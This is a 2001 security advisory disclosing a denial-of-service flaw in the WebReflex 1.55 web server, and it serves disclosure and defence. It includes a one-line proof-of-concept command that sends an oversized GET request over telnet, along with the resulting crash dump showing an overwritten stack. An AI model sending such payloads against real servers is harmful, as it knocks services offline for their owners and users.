WebReflex 1.55 HTTPd DoS

[slipy () B10Z NET]

Introduction:

WebReflex is an easy to use web server that's easy 
to set up and use. It has many features like a limitless 
amount of concurrent requests, Drive and directory 
lists, Built in server side image-maps, Implementation 
of the CGI-WIN standard, User defined directory 
index files, User defined error files, Built in MIME type 
mappings plus user defined mappings, Built in server-
push using sequence files, Log file using the 
common log file format and all the rest. The best 
feature of this server is the ability to run it from a CD-
ROM. 


The Vendors website is:
http://www.sapio.com/reflex/


Problem: Denial of Service Attack
WebReflex 1.55 is vulnerable to a simple Denial of 
Service attack which will result in the program 
causing a General Protection Fault and end up quiting
the program. WebReflex is for the Microsoft (c) 
operating systems, all apear to be vulnerable. 


Examples:

echo "GET " `perl -e 'print "A" x 666'` | telnet 
192.168.0.20 80

^^ = Will cause the program to quit within seconds 
and display:

REFLEX16 caused a general protection fault
in module KRNL386.EXE at 0001:00008aee.
Registers:
EAX=86cf0000 CS=014f EIP=00008aee 
EFLGS=00000282 EBX=830f000a SS=86f7 
ESP=00008d86 EBP=00008da0 ECX=0000000a 
DS=0167 ESI=00009051 FS=0000 EDX=ffff8dae 
ES=86ef EDI=00008c82 GS=0000
Bytes at CS:EIP:
07 1f 61 c3 06 2e 8e 06 02 00 26 89 16 f4 12 26 
Stack dump:
41414141 41414141 41414141 41414141 41414141 
41414141 41414141 41414141 41414141 41414141 
41414141 41414141 41414141 41414141 41414141 
41414141 

Solution:

Vendor has been notified, and waiting for reply.

--------------------
b10z HTTPd Advisory
slipy () b10z net

Found: February 27th, 2001.